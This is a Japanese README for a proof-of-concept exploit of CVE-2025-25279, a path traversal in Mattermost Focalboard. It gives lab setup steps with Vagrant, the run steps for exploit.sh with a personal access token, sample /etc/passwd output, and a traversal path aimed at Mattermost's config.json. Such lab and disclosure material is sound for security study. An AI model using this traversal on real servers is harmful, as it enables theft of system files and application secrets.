
CVE-2025-25279の概念実証エクスプロイト。Mattermost Focalboardのパストラバーサルにより、認証済みユーザーが任意のファイルを読み取り、機密ファイルを外部に持ち出すことが可能になります。
この概念実証は、Mattermost 10.4.1 に影響する脆弱性 CVE-2025-25279 の悪用を示します。
Focalboard(ボード管理モジュール)の欠陥により、添付ファイル内のパストラバーサルを介して任意のファイル読み取りが可能になります。
このエクスプロイトにより、以下を流出させることができます:
/etc/passwd/etc/groupopt/mattermost/config/config.json攻撃は、認証されたユーザーアカウントでのみ機能します(脆弱なシナリオの場合)。
target/ フォルダは含まれていません(GitHub には大きすぎます)。
まず target ディレクトリに移動し、以下を実行します:
cd target
make mattermost.box
mattermost-poc ボックスが存在しないと VM が動作しないため、必ず追加してください:
cd cve-2025-25279-mattermost
vagrant box add mattermost-poc target/mattermost.box
cd live/vm1
vagrant up
VM に接続
vagrant ssh
プロフィール → セキュリティ → パーソナルアクセストークン
ホストマシンから:
cd live/share
sudo apt-get update -y
sudo apt-get install -y unzip
chmod +x exploit.sh
./exploit.sh
以下の入力を求められます:
PAT (Personal Access Token) :
👉 Mattermost ユーザーの有効な PAT を入力してください。
📸 出力例(/etc/passwd の流出)
===== 内容(先頭) =====
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...
mattermost:x:999:996::/opt/mattermost:/bin/sh
対象ファイル:config.json
Mattermost の機密ファイルを狙う場合:
exploit.sh スクリプトの上部を編集:
TARGET_SUFFIX="opt/mattermost/config/config.json"
TRAVERSAL_PATH='../../../../../../../opt/mattermost/config/config.json'
エクスプロイトは config.json の内容を表示します。
🟢 MAHAMMAD MOUSSE Abokor 🔵 PARNET cyril
🎬 デモ動画
👉 完全なデモ動画は以下にあります: live/Démonstration/video-poc-cve-2025-25279.mp4
🧩 注記
この PoC は学習環境専用です。 教育目的以外、または許可なく使用しないでください。